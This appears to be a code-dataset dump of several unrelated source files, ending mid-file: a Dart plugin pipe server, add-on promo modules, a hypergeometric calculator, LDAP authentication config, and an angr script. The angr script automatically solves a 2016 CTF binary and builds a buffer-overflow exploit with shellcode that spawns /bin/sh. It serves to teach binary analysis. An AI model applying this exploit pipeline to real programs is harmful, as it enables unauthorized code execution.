| apache-2.0 | 3,715,393,012,582,015,500 | 38.080183 | 79 | 0.560219 | false |
guillermooo-forks/dart-sublime-bundle | lib/analyzer/pipe_server.py | 3 | 1941 | # Copyright (c) 2014, Guillermo López-Anglada. Please see the AUTHORS file for details.
# All rights reserved. Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.)
'''Wraps a process to make it act as a pipe server. Takes care of supressing
console windows under Windows and other housekeeping.
'''
from subprocess import Popen
from subprocess import PIPE
import threading
from Dart.sublime_plugin_lib import PluginLogger
from Dart.sublime_plugin_lib.plat import supress_window
from Dart.sublime_plugin_lib.path import pushd
_logger = PluginLogger(__name__)
class PipeServer(object):
'''Starts as process and communicates with it via pipes.
'''
status_lock = threading.RLock()
def __init__(self, args):
self.proc = None
self.args = args
@property
def is_running(self):
'''Returns `True` if the server seems to be responsive.
'''
try:
with PipeServer.status_lock:
return not self.proc.stdin.closed
except AttributeError:
_logger.debug('PipeServer not started yet')
return
def start(self, working_dir='.'):
with PipeServer.status_lock:
if self.is_running:
_logger.debug(
'tried to start an already running PipeServer; aborting')
return
with pushd(working_dir):
_logger.debug('starting PipeServer with args: %s', self.args)
self.proc = Popen(self.args,
stdout=PIPE,
stdin=PIPE,
stderr=PIPE,
startupinfo=supress_window())
def stop(self):
_logger.debug('stopping PipeServer...')
self.proc.stdin.close()
self.proc.stdout.close()
self.proc.kill()
| bsd-3-clause | -4,318,954,298,407,976,400 | 31.333333 | 87 | 0.587629 | false |
lavish205/olympia | src/olympia/legacy_discovery/modules.py | 1 | 9316 | # -*- coding: utf-8 -*-
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
import jinja2
from olympia.addons.models import Addon
from olympia.bandwagon.models import (
Collection, MonthlyPick as MonthlyPickModel)
from olympia.legacy_api.views import addon_filter
from olympia.versions.compare import version_int
from olympia.lib.cache import cache_get_or_set, make_key
# The global registry for promo modules. Managed through PromoModuleMeta.
registry = {}
class PromoModuleMeta(type):
"""Adds new PromoModules to the module registry."""
def __new__(mcs, name, bases, dict_):
cls = type.__new__(mcs, name, bases, dict_)
if 'abstract' not in dict_:
registry[cls.slug] = cls
return cls
class PromoModule(object):
"""
Base class for promo modules in the discovery pane.
Subclasses should assign a slug and define render(). The slug is only used
internally, so it doesn't have to really be a slug.
"""
__metaclass__ = PromoModuleMeta
abstract = True
slug = None
def __init__(self, request, platform, version):
self.request = request
self.platform = platform
self.version = version
self.compat_mode = 'strict'
if version_int(self.version) >= version_int('10.0'):
self.compat_mode = 'ignore'
def render(self):
raise NotImplementedError
class TemplatePromo(PromoModule):
abstract = True
template = None
def context(self, **kwargs):
return {}
def render(self, **kw):
c = dict(self.context(**kw))
c.update(kw)
r = render_to_string(self.template, c, request=self.request)
return jinja2.Markup(r)
class MonthlyPick(TemplatePromo):
slug = 'Monthly Pick'
template = 'legacy_discovery/modules/monthly.html'
def get_pick(self, locale):
monthly_pick = MonthlyPickModel.objects.filter(locale=locale)[0]
if not monthly_pick.addon.is_public():
raise IndexError
return monthly_pick
def context(self, **kwargs):
try:
monthly_pick = self.get_pick(self.request.LANG)
except IndexError:
try:
# No MonthlyPick available in the user's locale, use '' to get
# the global pick if there is one.
monthly_pick = self.get_pick('')
except IndexError:
monthly_pick = None
return {'pick': monthly_pick, 'module_context': 'discovery'}
class CollectionPromo(PromoModule):
abstract = True
template = 'legacy_discovery/modules/collection.html'
title = None
subtitle = None
cls = 'promo'
limit = 3
linkify_title = False
def __init__(self, *args, **kw):
super(CollectionPromo, self).__init__(*args, **kw)
self.collection = None
try:
self.collection = Collection.objects.get(
author__username=self.collection_author,
slug=self.collection_slug)
except Collection.DoesNotExist:
pass
def get_descriptions(self):
return {}
def get_addons(self):
addons = self.collection.addons.public()
kw = {
'addon_type': 'ALL',
'limit': self.limit,
'app': self.request.APP,
'platform': self.platform,
'version': self.version,
'compat_mode': self.compat_mode
}
def fetch_and_filter_addons():
return addon_filter(addons, **kw)
# The cache-key can be very long, let's normalize it to make sure
# we never hit the 250-char limit of memcached.
cache_key = make_key(
'collections-promo-get-addons:{}'.format(repr(kw)),
normalize=True)
return cache_get_or_set(cache_key, fetch_and_filter_addons)
def render(self, module_context='discovery'):
if module_context == 'home':
self.platform = 'ALL'
self.version = None
context = {
'promo': self,
'module_context': module_context,
'descriptions': self.get_descriptions()
}
if self.collection:
context['addons'] = self.get_addons()
return jinja2.Markup(render_to_string(
self.template, context, request=self.request))
class ShoppingCollection(CollectionPromo):
slug = 'Shopping Collection'
collection_author, collection_slug = 'mozilla', 'onlineshopping'
cls = 'promo promo-purple'
title = _(u'Shopping Made Easy')
subtitle = _(u'Save on your favorite items '
u'from the comfort of your browser.')
class WebdevCollection(CollectionPromo):
slug = 'Webdev Collection'
collection_author, collection_slug = 'mozilla', 'webdeveloper'
cls = 'webdev'
title = _(u'Build the perfect website')
class TestPilot(TemplatePromo):
slug = 'Test Pilot'
cls = 'promo promo-test-pilot'
template = 'legacy_discovery/modules/testpilot.html'
def context(self, **kwargs):
return {'module_context': 'discovery'}
class StarterPack(CollectionPromo):
slug = 'Starter Pack'
collection_author, collection_slug = 'mozilla', 'starter'
id = 'starter'
cls = 'promo'
title = _(u'First time with Add-ons?')
subtitle = _(u'Not to worry, here are three to get started.')
def get_descriptions(self):
return {
2257: _(u'Translate content on the web from and into over 40 '
'languages.'),
1833: _(u"Easily connect to your social networks, and share or "
"comment on the page you're visiting."),
11377: _(u'A quick view to compare prices when you shop online '
'or search for flights.')
}
class StPatricksPersonas(CollectionPromo):
slug = 'St. Pat Themes'
collection_author, collection_slug = 'mozilla', 'st-patricks-day'
id = 'st-patricks'
cls = 'promo'
title = _(u'St. Patrick’s Day Themes')
subtitle = _(u'Decorate your browser to celebrate '
'St. Patrick’s Day.')
class SchoolCollection(CollectionPromo):
slug = 'School'
collection_author, collection_slug = 'mozilla', 'back-to-school'
id = 'school'
cls = 'promo'
title = _(u'A+ add-ons for School')
subtitle = _(u'Add-ons for teachers, parents, and students heading back '
'to school.')
def get_descriptions(self):
return {
3456: _(u'Would you like to know which websites you can trust?'),
2410: _(u'Xmarks is the #1 bookmarking add-on.'),
2444: _(u'Web page and text translator, dictionary, and more!')
}
# The add-ons that go with the promo modal. Not an actual PromoModule
class PromoVideoCollection():
items = (349111, 349155, 349157, 52659, 5579, 252539, 11377, 2257)
def get_items(self):
items = Addon.objects.in_bulk(self.items)
return [items[i] for i in self.items if i in items]
class ValentinesDay(CollectionPromo):
slug = 'Valentines Day'
collection_author, collection_slug = 'mozilla', 'bemine'
id = 'valentines'
title = _(u'Love is in the Air')
subtitle = _(u'Add some romance to your Firefox.')
class Fitness(CollectionPromo):
slug = 'Fitness'
cls = 'promo promo-yellow'
collection_author, collection_slug = 'mozilla', 'fitness'
title = _(u'Get up and move!')
subtitle = _(u'Install these fitness add-ons to keep you active and '
u'healthy.')
class UpAndComing(CollectionPromo):
slug = 'Up & Coming'
cls = 'promo promo-blue'
collection_author, collection_slug = 'mozilla', 'up_coming'
title = _(u'New & Now')
subtitle = _(u'Get the latest, must-have add-ons of the moment.')
class Privacy(CollectionPromo):
slug = 'Privacy Collection'
cls = 'promo promo-purple'
collection_author, collection_slug = 'mozilla', 'privacy'
title = _(u'Worry-free browsing')
subtitle = _(u'Protect your privacy online with the add-ons in this '
u'collection.')
class Featured(CollectionPromo):
slug = 'Featured Add-ons Collection'
cls = 'promo promo-yellow'
collection_author, collection_slug = 'mozilla', 'featured-add-ons'
title = _(u'Featured Add-ons')
subtitle = _(u'Great add-ons for work, fun, privacy, productivity… '
u'just about anything!')
class Games(CollectionPromo):
slug = 'Games!'
cls = 'promo promo-purple'
collection_author, collection_slug = 'mozilla', 'games'
title = _(u'Games!')
subtitle = _(u'Add more fun to your Firefox. Play dozens of games right '
u'from your browser—puzzles, classic arcade, action games, '
u'and more!')
linkify_title = True
class MustHaveMedia(CollectionPromo):
slug = 'Must-Have Media'
cls = 'promo promo-purple'
collection_author, collection_slug = 'mozilla', 'must-have-media'
title = _(u'Must-Have Media')
subtitle = _(u'Take better screenshots, improve your online video '
u'experience, finally learn how to make a GIF, and other '
u'great media tools.')
linkify_title = True
| bsd-3-clause | -3,985,784,769,514,446,000 | 31.228374 | 79 | 0.617994 | false |
TiniKhang/cfvg-discordbot | Hyper_Calculator.py | 2 | 2773 | import math
from fractions import *
def smallernum(a,b):
'''Return the smaller of two values'''
if a < b: return a
else: return b
def Odds(a,b,d):
'''Returns probability
Parent: HGC()
Called when: sample size is 1
Why: Prevents factorials from being made, as it is unnecessary. Of course,
computers are so fast this method probably isn't necessary anyway.
'''
if d == 1: return Fraction(b,a)
else: return Fraction(a-b,a)
def P(n, r):
'''Returns nPr as a fraction'''
if (r>n): return 0
else: return Fraction(math.factorial(n),math.factorial(n - r))
def C(n, r):
'''Returns nCr as a fraction'''
if (r>n): return 0
else: return Fraction(P(n,r),math.factorial(r))
# return math.factorial(n) / (math.factorial(r) * math.factorial(n - r)
def HGC(a,b,c,d):
'''Hyper Geometric Calculator
Variables
a: Population size
b: Possible sucesses
c: Sample size
d: # of successes
'''
if (b>a) | (c>a) | (d>a) | (d>c): return 0
elif c == 1: return Odds(a,b,d)
else: return Fraction(C(b,d)*C(a-b,c-d),C(a,c))
def HGCC(a,b,c,d,find="="):
'''Hyper Geometric Cumulative Calculator
Calls HGC() multiple times, based on the "find" modifier
Variables
a: Population size
b: Possible successes
c: Sample size
d: # of successes
find: modifies variable d. Available inputs; < ,<= ,> , >=, =
'''
if find == "<":
x = 0
for i in range(d): x += HGC(a,b,c,i)
return x
elif find == "<=":
x = 0
for i in range(d+1): x += HGC(a,b,c,i)
return x
elif find == ">":
x = 0
f = smallernum(c,b)
for i in range(d+1,f+1): x += HGC(a,b,c,i)
return x
elif find == ">=":
x = 0
f = smallernum(c,b)
for i in range(d,f+1): x += HGC(a,b,c,i)
return x
else: return HGC(a,b,c,d)
def quickodds(a,b,c,d):
'''Displays all probabilities of a given value
Calls all modifiers of HGCC()
Variables
a: Population size
b: Possible successes
c: Sample size
d: # of successes
'''
tmp = "\n"
tmp += "Chance to get exactly {}: {}\n".format(d,HGCC(a,b,c,d,find="="))
tmp += "Chance to less than {}: {}\n".format(d,HGCC(a,b,c,d,find="<"))
tmp += "Chance to get less than or equal to {}: {}\n".format(d,HGCC(a,b,c,d,find="<="))
tmp += "Chance to more than {}: {}\n".format(d,HGCC(a,b,c,d,find=">"))
tmp += "Chance to get more than or equal to {}: {}\n".format(d,HGCC(a,b,c,d,find=">="))
return tmp
def cascadeodds(a,b,c):
'''Print exact odds for each # of successes'''
tmp = ""
for i in range(0,c+1): tmp += "Chance to get exactly {}: {}\n".format(i,HGC(a,b,c,i))
return tmp
| mit | -16,031,917,814,267,832 | 27.010101 | 91 | 0.559683 | false |
Ruide/angr-dev | angr-doc/examples/secuinside2016mbrainfuzz/solve.py | 1 | 5451 | # This example is for secuinsides mbrainfuzz challenge (2016)
# The challenge gave you binaries which you automatically had
# to exploit - since the service is not online anymore, 4 example
# binaries, obtained during the ctf, are included in this example
# The script is based on the writeup at
# https://tasteless.eu/post/2016/07/secuinside-mbrainfuzz/ - the
# difference is that the static analyses part is done with angr instead of r2
import re
import sys
import angr
import claripy
import subprocess
def static_analyses(p):
print '[*] Analyzing %s...' % p.filename
#This part is done with r2 in the original writeup.
#However, it is also possible to do the same with angr! :)
to_find, to_avoid, byte_addresses = [], [], []
find_hex_re = re.compile('(0x[0-9a-fA-F]{6})')
#Our main interface for this part will be the cfg. For performance reasons, we use CFGFast
cfg = p.analyses.CFGFast()
#As the main function doesn't get identified automatically, let's use a small trick here:
#We take a function which is only called in main (e.g. sscanf) and resolve its predecessor
for address,function in cfg.functions.iteritems():
if function.name == '__isoc99_sscanf' and function.is_plt:
addr = cfg.functions.callgraph.predecessors(address)[0]
break
#Now, let's go down all the way to the target function
while True:
function = cfg.functions[addr]
#First, let's get all call_sites and leave the loop, if there are none
call_sites = function.get_call_sites()
if not len(call_sites):
break
#Now, Let's get the address of the basic block calling the next target function.
#The sorting and indexing is only relevant for the main function.
calling_block_addr = sorted(call_sites)[-1]
#Resolve the target addr
addr = function.get_call_target(calling_block_addr)
#Since we are already on it, let's apply a dirty heuristic to populate the to_avoid list
#This works because the returning block from the function is at a fixed offset after the call
#We could also develop a cleaner solution if we wouldn't use CFGFast() - but this would slow us down
avoid = function.get_call_return(calling_block_addr) + 3
#Last but not least, let's get the addresses of the processed bytes
calling_block = p.factory.block(calling_block_addr)
local_addresses = []
for ins in calling_block.capstone.insns:
m = re.search(find_hex_re,ins.op_str)
if ins.insn_name() == 'movzx' and m:
#The bytes are fetched via rip-relative addressing
local_addresses.append(int(m.group(),16) + ins.size + ins.address)
to_find.append(addr)
to_avoid.append(avoid)
byte_addresses.append(local_addresses)
return to_find, to_avoid, byte_addresses
#pylint:disable=redefined-builtin
def generate_input(p, to_find, to_avoid, byte_addresses):
print '[*] Generating input ....'
input = {}
for i in range(0,len(to_find)-1):
f = to_find[i]
t = to_find[i+1]
#Set up the state for the function we want to solve
e = p.factory.entry_state(addr=f)
rdi = claripy.BVS('rdi', 64)
rsi = claripy.BVS('rsi', 64)
rdx = claripy.BVS('rdx', 64)
rcx = claripy.BVS('rcx', 64)
e.regs.rdi = rdi
e.regs.rsi = rsi
e.regs.rdx = rdx
e.regs.rcx = rcx
#Generate a SimulationManager out of this state and explore
sm = p.factory.simgr(e)
sm.explore(find=t,avoid=to_avoid)
#Save the solutions
found = sm.found[0]
address_local = byte_addresses[i]
input[address_local[3]] = found.se.eval(rdi)
input[address_local[2]] = found.se.eval(rsi)
input[address_local[1]] = found.se.eval(rdx)
input[address_local[0]] = found.se.eval(rcx)
return input
def format_input(input):
res = ''
for i in input:
res += "%02x" % input[i]
return res
def generate_exploit(input):
print '[*] Crafting final exploit'
#In essence, the magic consists of:
# - static padding between input and the memcpy'ed buffer
# - padding from start of this buffer up to the location of the saved return address
# - the address of the shellcode
# - customized shellcode for '/bin/sh -c "echo SUCCESS"'
#For more details of the magic, please check the writeup linked above
magic = '424242424242424242424141414141414141414141414141414141414141414141412e626000000000006563686f20275355434345535327004141414141414141414141414141414141414141414141414141414141414141412f62696e2f7368002d630000000000004831c050b8ee61600050b82662600050b81e626000504889e64889c74831d2b83b0000000f05'
exploit = input + magic
return exploit
def main(binary):
p = angr.Project(binary)
(to_find, to_avoid, byte_addresses) = static_analyses(p)
input = generate_input(p, to_find, to_avoid, byte_addresses)
exploit = generate_exploit(format_input(input))
print '[+] Exploit generated!'
print '[!] Please run `%s %s`' % (binary,exploit)
return exploit
def test():
binaries = ['./sample_1','./sample_2','./sample_3','./sample_4']
for b in binaries:
p = main(b)
assert subprocess.check_output([b,p]) == 'SUCCESS\n'
if __name__ == '__main__':
main(sys.argv[1])
| bsd-2-clause | 3,890,985,157,817,336,300 | 35.831081 | 302 | 0.659695 | false |
janus-ets/django-auth-ldap3 | django_auth_ldap/config.py | 2 | 22852 | # Copyright (c) 2009, Peter Sagerson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module contains classes that will be needed for configuration of LDAP
authentication. Unlike backend.py, this is safe to import into settings.py.
Please see the docstring on the backend module for more information, including
notes on naming conventions.
"""
import ldap
import logging
import pprint
try:
from django.utils.encoding import force_str
except ImportError: # Django < 1.5
from django.utils.encoding import smart_str as force_str
class _LDAPConfig(object):
"""
A private class that loads and caches some global objects.
"""
ldap = None
logger = None
_ldap_configured = False
def get_ldap(cls, global_options=None):
"""
Returns the ldap module. The unit test harness will assign a mock object
to _LDAPConfig.ldap. It is imperative that the ldap module not be
imported anywhere else so that the unit tests will pass in the absence
of python-ldap.
"""
if cls.ldap is None:
import ldap.filter
# Support for python-ldap < 2.0.6
try:
import ldap.dn
except ImportError:
from django_auth_ldap import dn
ldap.dn = dn
cls.ldap = ldap
# Apply global LDAP options once
if (not cls._ldap_configured) and (global_options is not None):
for opt, value in global_options.items():
cls.ldap.set_option(opt, value)
cls._ldap_configured = True
return cls.ldap
get_ldap = classmethod(get_ldap)
def get_logger(cls):
"""
Initializes and returns our logger instance.
"""
if cls.logger is None:
class NullHandler(logging.Handler):
def emit(self, record):
pass
cls.logger = logging.getLogger('django_auth_ldap')
cls.logger.addHandler(NullHandler())
return cls.logger
get_logger = classmethod(get_logger)
# Our global logger
logger = _LDAPConfig.get_logger()
class LDAPSearch(object):
"""
Public class that holds a set of LDAP search parameters. Objects of this
class should be considered immutable. Only the initialization method is
documented for configuration purposes. Internal clients may use the other
methods to refine and execute the search.
"""
def __init__(self, base_dn, scope, filterstr=u'(objectClass=*)'):
"""
These parameters are the same as the first three parameters to
ldap.search_s.
"""
self.base_dn = base_dn
self.scope = scope
self.filterstr = filterstr
self.ldap = _LDAPConfig.get_ldap()
def search_with_additional_terms(self, term_dict, escape=True):
"""
Returns a new search object with additional search terms and-ed to the
filter string. term_dict maps attribute names to assertion values. If
you don't want the values escaped, pass escape=False.
"""
term_strings = [self.filterstr]
for name, value in term_dict.items():
if escape:
value = self.ldap.filter.escape_filter_chars(value)
term_strings.append(u'(%s=%s)' % (name, value))
filterstr = u'(&%s)' % ''.join(term_strings)
return self.__class__(self.base_dn, self.scope, filterstr)
def search_with_additional_term_string(self, filterstr):
"""
Returns a new search object with filterstr and-ed to the original filter
string. The caller is responsible for passing in a properly escaped
string.
"""
filterstr = u'(&%s%s)' % (self.filterstr, filterstr)
return self.__class__(self.base_dn, self.scope, filterstr)
def execute(self, connection, filterargs=(), escape=True):
"""
Executes the search on the given connection (an LDAPObject). filterargs
is an object that will be used for expansion of the filter string.
If escape is True, values in filterargs will be escaped.
The python-ldap library returns utf8-encoded strings. For the sake of
sanity, this method will decode all result strings and return them as
Unicode.
"""
if escape:
filterargs = self._escape_filterargs(filterargs)
try:
filterstr = self.filterstr % filterargs
results = connection.search_s(force_str(self.base_dn),
self.scope,
force_str(filterstr))
except ldap.LDAPError as e:
results = []
logger.error(u"search_s('%s', %d, '%s') raised %s" %
(self.base_dn, self.scope, filterstr, pprint.pformat(e)))
return self._process_results(results)
def _begin(self, connection, filterargs=(), escape=True):
"""
Begins an asynchronous search and returns the message id to retrieve
the results.
filterargs is an object that will be used for expansion of the filter
string. If escape is True, values in filterargs will be escaped.
"""
if escape:
filterargs = self._escape_filterargs(filterargs)
try:
filterstr = self.filterstr % filterargs
msgid = connection.search(force_str(self.base_dn),
self.scope, force_str(filterstr))
except ldap.LDAPError as e:
msgid = None
logger.error(u"search('%s', %d, '%s') raised %s" %
(self.base_dn, self.scope, filterstr, pprint.pformat(e)))
return msgid
def _results(self, connection, msgid):
"""
Returns the result of a previous asynchronous query.
"""
try:
kind, results = connection.result(msgid)
if kind != ldap.RES_SEARCH_RESULT:
results = []
except ldap.LDAPError as e:
results = []
logger.error(u"result(%d) raised %s" % (msgid, pprint.pformat(e)))
return self._process_results(results)
def _escape_filterargs(self, filterargs):
"""
Escapes values in filterargs.
filterargs is a value suitable for Django's string formatting operator
(%), which means it's either a tuple or a dict. This return a new tuple
or dict with all values escaped for use in filter strings.
"""
if isinstance(filterargs, tuple):
filterargs = tuple(self.ldap.filter.escape_filter_chars(value)
for value in filterargs)
elif isinstance(filterargs, dict):
filterargs = dict((key, self.ldap.filter.escape_filter_chars(value))
for key, value in filterargs.items())
else:
raise TypeError("filterargs must be a tuple or dict.")
return filterargs
def _process_results(self, results):
"""
Returns a sanitized copy of raw LDAP results. This scrubs out
references, decodes utf8, normalizes DNs, etc.
"""
results = [r for r in results if r[0] is not None]
results = _DeepStringCoder('utf-8').decode(results)
# The normal form of a DN is lower case.
results = [(r[0].lower(), r[1]) for r in results]
result_dns = [result[0] for result in results]
logger.debug(u"search_s('%s', %d, '%s') returned %d objects: %s" %
(self.base_dn, self.scope, self.filterstr, len(result_dns),
"; ".join(result_dns)))
return results
class LDAPSearchUnion(object):
"""
A compound search object that returns the union of the results. Instantiate
it with one or more LDAPSearch objects.
"""
def __init__(self, *args):
self.searches = args
self.ldap = _LDAPConfig.get_ldap()
def search_with_additional_terms(self, term_dict, escape=True):
searches = [s.search_with_additional_terms(term_dict, escape)
for s in self.searches]
return self.__class__(*searches)
def search_with_additional_term_string(self, filterstr):
searches = [s.search_with_additional_term_string(filterstr)
for s in self.searches]
return self.__class__(*searches)
def execute(self, connection, filterargs=()):
msgids = [search._begin(connection, filterargs) for search in self.searches]
results = {}
for search, msgid in zip(self.searches, msgids):
if msgid is not None:
result = search._results(connection, msgid)
results.update(dict(result))
return results.items()
class _DeepStringCoder(object):
"""
Encodes and decodes strings in a nested structure of lists, tuples, and
dicts. This is helpful when interacting with the Unicode-unaware
python-ldap.
"""
def __init__(self, encoding):
self.encoding = encoding
self.ldap = _LDAPConfig.get_ldap()
def decode(self, value):
try:
if isinstance(value, bytes):
value = value.decode(self.encoding)
elif isinstance(value, list):
value = self._decode_list(value)
elif isinstance(value, tuple):
value = tuple(self._decode_list(value))
elif isinstance(value, dict):
value = self._decode_dict(value)
except UnicodeDecodeError:
pass
return value
def _decode_list(self, value):
return [self.decode(v) for v in value]
def _decode_dict(self, value):
# Attribute dictionaries should be case-insensitive. python-ldap
# defines this, although for some reason, it doesn't appear to use it
# for search results.
decoded = self.ldap.cidict.cidict()
for k, v in value.items():
decoded[self.decode(k)] = self.decode(v)
return decoded
class LDAPGroupType(object):
"""
This is an abstract base class for classes that determine LDAP group
membership. A group can mean many different things in LDAP, so we will need
a concrete subclass for each grouping mechanism. Clients may subclass this
if they have a group mechanism that is not handled by a built-in
implementation.
name_attr is the name of the LDAP attribute from which we will take the
Django group name.
Subclasses in this file must use self.ldap to access the python-ldap module.
This will be a mock object during unit tests.
"""
def __init__(self, name_attr="cn"):
self.name_attr = name_attr
self.ldap = _LDAPConfig.get_ldap()
def user_groups(self, ldap_user, group_search):
"""
Returns a list of group_info structures, each one a group to which
ldap_user belongs. group_search is an LDAPSearch object that returns all
of the groups that the user might belong to. Typical implementations
will apply additional filters to group_search and return the results of
the search. ldap_user represents the user and has the following three
properties:
dn: the distinguished name
attrs: a dictionary of LDAP attributes (with lists of values)
connection: an LDAPObject that has been bound with credentials
This is the primitive method in the API and must be implemented.
"""
return []
def is_member(self, ldap_user, group_dn):
"""
This method is an optimization for determining group membership without
loading all of the user's groups. Subclasses that are able to do this
may return True or False. ldap_user is as above. group_dn is the
distinguished name of the group in question.
The base implementation returns None, which means we don't have enough
information. The caller will have to call user_groups() instead and look
for group_dn in the results.
"""
return None
def group_name_from_info(self, group_info):
"""
Given the (DN, attrs) 2-tuple of an LDAP group, this returns the name of
the Django group. This may return None to indicate that a particular
LDAP group has no corresponding Django group.
The base implementation returns the value of the cn attribute, or
whichever attribute was given to __init__ in the name_attr
parameter.
"""
try:
name = group_info[1][self.name_attr][0]
except (KeyError, IndexError):
name = None
return name
class PosixGroupType(LDAPGroupType):
"""
An LDAPGroupType subclass that handles groups of class posixGroup.
"""
def user_groups(self, ldap_user, group_search):
"""
Searches for any group that is either the user's primary or contains the
user as a member.
"""
groups = []
try:
user_uid = ldap_user.attrs['uid'][0]
if 'gidNumber' in ldap_user.attrs:
user_gid = ldap_user.attrs['gidNumber'][0]
filterstr = u'(|(gidNumber=%s)(memberUid=%s))' % (
self.ldap.filter.escape_filter_chars(user_gid),
self.ldap.filter.escape_filter_chars(user_uid)
)
else:
filterstr = u'(memberUid=%s)' % (
self.ldap.filter.escape_filter_chars(user_uid),
)
search = group_search.search_with_additional_term_string(filterstr)
groups = search.execute(ldap_user.connection)
except (KeyError, IndexError):
pass
return groups
def is_member(self, ldap_user, group_dn):
"""
Returns True if the group is the user's primary group or if the user is
listed in the group's memberUid attribute.
"""
try:
user_uid = ldap_user.attrs['uid'][0]
try:
is_member = ldap_user.connection.compare_s(force_str(group_dn), 'memberUid', force_str(user_uid))
except (ldap.UNDEFINED_TYPE, ldap.NO_SUCH_ATTRIBUTE):
is_member = False
if not is_member:
try:
user_gid = ldap_user.attrs['gidNumber'][0]
is_member = ldap_user.connection.compare_s(force_str(group_dn), 'gidNumber', force_str(user_gid))
except (ldap.UNDEFINED_TYPE, ldap.NO_SUCH_ATTRIBUTE):
is_member = False
except (KeyError, IndexError):
is_member = False
return is_member
class MemberDNGroupType(LDAPGroupType):
"""
A group type that stores lists of members as distinguished names.
"""
def __init__(self, member_attr, name_attr='cn'):
"""
member_attr is the attribute on the group object that holds the list of
member DNs.
"""
self.member_attr = member_attr
super(MemberDNGroupType, self).__init__(name_attr)
def user_groups(self, ldap_user, group_search):
search = group_search.search_with_additional_terms({self.member_attr: ldap_user.dn})
groups = search.execute(ldap_user.connection)
return groups
def is_member(self, ldap_user, group_dn):
try:
result = ldap_user.connection.compare_s(
force_str(group_dn),
force_str(self.member_attr),
force_str(ldap_user.dn)
)
except (ldap.UNDEFINED_TYPE, ldap.NO_SUCH_ATTRIBUTE):
result = 0
return result
class NISGroupType(LDAPGroupType):
"""
A group type that handles nisNetgroup.
"""
def user_groups(self, ldap_user, group_search):
try:
user_uid = ldap_user.attrs['uid'][0]
filterstr = u'(|(nisNetgroupTriple=%s)(nisNetgroupTriple=%s))' % (
self.ldap.filter.escape_filter_chars('(,%s,)' % user_uid),
self.ldap.filter.escape_filter_chars('(-,%s,-)' % user_uid)
)
search = group_search.search_with_additional_term_string(filterstr)
groups = search.execute(ldap_user.connection)
except (KeyError, IndexError):
pass
return groups
def is_member(self, ldap_user, group_dn):
try:
user_uid = ldap_user.attrs['uid'][0]
result = ldap_user.connection.compare_s(
force_str(group_dn),
force_str('nisNetgroupTriple'),
force_str('(,%s,)' % (user_uid))
)
if result == 0:
result = ldap_user.connection.compare_s(
force_str(group_dn),
force_str('nisNetgroupTriple'),
force_str('(-,%s,-)' % (user_uid))
)
except (ldap.UNDEFINED_TYPE, ldap.NO_SUCH_ATTRIBUTE, KeyError, IndexError):
result = 0
return result
class NestedMemberDNGroupType(LDAPGroupType):
"""
A group type that stores lists of members as distinguished names and
supports nested groups. There is no shortcut for is_member in this case, so
it's left unimplemented.
"""
def __init__(self, member_attr, name_attr='cn'):
"""
member_attr is the attribute on the group object that holds the list of
member DNs.
"""
self.member_attr = member_attr
super(NestedMemberDNGroupType, self).__init__(name_attr)
def user_groups(self, ldap_user, group_search):
"""
This searches for all of a user's groups from the bottom up. In other
words, it returns the groups that the user belongs to, the groups that
those groups belong to, etc. Circular references will be detected and
pruned.
"""
group_info_map = {} # Maps group_dn to group_info of groups we've found
member_dn_set = set([ldap_user.dn]) # Member DNs to search with next
handled_dn_set = set() # Member DNs that we've already searched with
while len(member_dn_set) > 0:
group_infos = self.find_groups_with_any_member(member_dn_set,
group_search,
ldap_user.connection)
new_group_info_map = dict([(info[0], info) for info in group_infos])
group_info_map.update(new_group_info_map)
handled_dn_set.update(member_dn_set)
# Get ready for the next iteration. To avoid cycles, we make sure
# never to search with the same member DN twice.
member_dn_set = set(new_group_info_map.keys()) - handled_dn_set
return group_info_map.values()
def find_groups_with_any_member(self, member_dn_set, group_search, connection):
terms = [
u"(%s=%s)" % (self.member_attr, self.ldap.filter.escape_filter_chars(dn))
for dn in member_dn_set
]
filterstr = u"(|%s)" % "".join(terms)
search = group_search.search_with_additional_term_string(filterstr)
return search.execute(connection)
class GroupOfNamesType(MemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class groupOfNames.
"""
def __init__(self, name_attr='cn'):
super(GroupOfNamesType, self).__init__('member', name_attr)
class NestedGroupOfNamesType(NestedMemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class groupOfNames with
nested group references.
"""
def __init__(self, name_attr='cn'):
super(NestedGroupOfNamesType, self).__init__('member', name_attr)
class GroupOfUniqueNamesType(MemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class groupOfUniqueNames.
"""
def __init__(self, name_attr='cn'):
super(GroupOfUniqueNamesType, self).__init__('uniqueMember', name_attr)
class NestedGroupOfUniqueNamesType(NestedMemberDNGroupType):
"""
An LDAPGroupType subclass that handles groups of class groupOfUniqueNames
with nested group references.
"""
def __init__(self, name_attr='cn'):
super(NestedGroupOfUniqueNamesType, self).__init__('uniqueMember', name_attr)
class ActiveDirectoryGroupType(MemberDNGroupType):
"""
An LDAPGroupType subclass that handles Active Directory groups.
"""
def __init__(self, name_attr='cn'):
super(ActiveDirectoryGroupType, self).__init__('member', name_attr)
class NestedActiveDirectoryGroupType(NestedMemberDNGroupType):
"""
